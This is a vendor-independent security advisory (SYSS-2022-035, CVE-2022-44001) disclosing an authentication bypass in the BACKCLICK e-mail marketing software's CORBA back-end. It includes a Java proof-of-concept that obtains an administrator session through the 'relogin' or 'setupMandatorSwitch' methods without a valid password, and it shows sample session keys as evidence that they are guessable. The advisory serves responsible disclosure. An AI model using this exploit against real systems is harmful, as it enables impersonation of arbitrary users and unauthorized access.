-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 Advisory ID: SYSS-2022-035 Product: BACKCLICK Manufacturer: BACKCLICK GmbH Tested Version(s): BACKCLICK Professional 5.9.63 (On-Premises) Vulnerability Type: CWE-288: Authentication Bypass Using an Alternate Path or Channel Risk Level: High Solution Status: Unknown Manufacturer Notification: 2022-05-25 Public Disclosure: 2022-11-14 CVE Reference: CVE-2022-44001 Author of Advisory: Moritz Bechler, SySS GmbH ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Overview: BACKCLICK is a web application used for e-mail marketing and the creation of newsletters. The German manufacturer describes the product as follows (see [1]): "BACKCLICK ist eine webbasierte Enterprise E-Mail Marketing Lösung und Newsletter Software, mit der Sie online E-Mail Kampagnen und Newsletter erstellen und an Ihre Kunden versenden können." User authentication for accessing the CORBA back-end services can be bypassed. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Vulnerability Details: The primary BCServer CORBA back-end service session management is using "api_object" objects. Getting such an object requires calling the "login" method with correct user credentials. However, there is also a "relogin" which bypasses the password check. Calling that method, a session object for any user can be obtained. Alternatively, the "setupMandatorSwitch" method can be called first which will also disable the password check for the next login call for the specified user ID. Therefore, if access to the back-end CORBA service is possible, application actions can be performed posing as an arbitrary user. Furthermore, the object keys and therefore CORBA IORs for the user session objects do not appear to be sufficiently randomized and could be guessed by an attacker. That information would be sufficient to access these objects via CORBA. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Proof of Concept (PoC): The following exploit code was implemented using the JacORB CORBA client library. It obtains a reference to the BCServer object and bypasses authentication by either calling the relogin or the setupMandatorSwitch method. Both calls yield a valid "api_object" session. - ----- System.setProperty("org.omg.CORBA.ORBClass", "org.jacorb.orb.ORB"); System.setProperty("org.omg.CORBA.ORBSingletonClass", "org.jacorb.orb.ORBSingleton"); Properties props = new Properties(); String corbaloc = "corbaloc::" + "" + ":" + 2222 + "/StandardNS/NameServer-POA/_root"; props.setProperty("ORBInitRef.NameService", corbaloc); ORB o = ORB.init((String[])args, props); NamingContextConnection namingContextConnection = new NamingContextConnection(o); NamingContextExt namingContext = namingContextConnection.getNamingContext(); Object obj = namingContext.resolve(namingContext.to_name(name)); // the IOR returned by NameServer in our case did not contain the appropriate // network address and needed to be adjusted Object ior = getPatchedObject(o, "Backclick", host, port) login_factory lf = login_factoryHelper.narrow(ior); Object apiRef = lf.relogin("bcadmin", "doesnotmatter", "", "xyz", "1.2.3.5"); // alternative variant: lf.setupMandatorSwitch(1,0); apiRef = lf.login("bcadmin", "doesnotmatter", "", "foo", "1.2.3.4"); - ----- The object keys for the "api_object" session objects, for different, legitimatly authenticated users, were for example as follows: - ----- 9803807542/%15%06%258A%03%1EJ%1F%0F%10%060F8%14%14%1BHL%1B 9803807542/%17%06%258A%03%1EJ%1F%0F%10%060F8%14%14%1BHL%1B 9803807542/%0D%06%258A%03%1EJ%1F%0F%10%060F8%14%14%1BHL%1B - ----- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Solution: Contact vendor for solution. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclosure Timeline: 2022-05-25: Vulnerabilities reported to manufacturer 2022-06-28: Advisories provided again, as originals were not received 2022-07-20: Confirmation, inquiry regarding reproduction of one issue 2022-11-14: No more information received, public disclosure of vulnerabilities ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ References: [1] Product website for BACKCLICK https://www.backclick.de/ [2] SySS Security Advisory SYSS-2022-035 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2022-035.txt [3] SySS Responsible Disclosure Policy https://www.syss.de/en/responsible-disclosure-policy ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Credits: This security vulnerability was found by Moritz Bechler of SySS GmbH. E-Mail: moritz.bechler@syss.de Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Moritz_Bechler.asc Key ID: 0x768EFE2BB3E53DDA Key Fingerprint: 2C8F F101 9D77 BDE6 465E CCC2 768E FE2B B3E5 3DDA ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclaimer: The information provided in this security advisory is provided "as is" and without warranty of any kind. Details of this security advisory may be updated in order to provide as accurate information as possible. The latest version of this security advisory is available on the SySS website. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Copyright: Creative Commons - Attribution (by) - Version 3.0 URL: http://creativecommons.org/licenses/by/3.0/deed.en -----BEGIN PGP SIGNATURE----- iQEzBAEBCgAdFiEELI/xAZ13veZGXszCdo7+K7PlPdoFAmNkyT8ACgkQdo7+K7Pl PdpDGgf+Kj3FrE3YWFK6qEnAU831kiP3GBHBZ3h78RCop8jZ54jM03CLlfFvM7u+ ZVtlbqxjVC9b8OwW+lxe0PDp+DoKNy84KMGgoeBwYn8wRNE6kxFe+DROB3r+LooB MCvt7z53D/R6U29kJhmUjY/ZWqd/so35ehngEV/Z1Rl+Gmj41v61rEszIYBXgBiA VnbvPFYPKztsK0eE2OIoWb6Q7Yi+h2hED4qD96Y+2VbQUhY/v97bdsmi5YGpohOh pIqttevPZHHhvNdVDAvFt5lFKcZvKOcLbwcg7dPsQM25sKCf12I/p1OJjvWpFm1i kIzrt28JS3FvdvdQ+EGDOul1bVOgEg== =sQFz -----END PGP SIGNATURE-----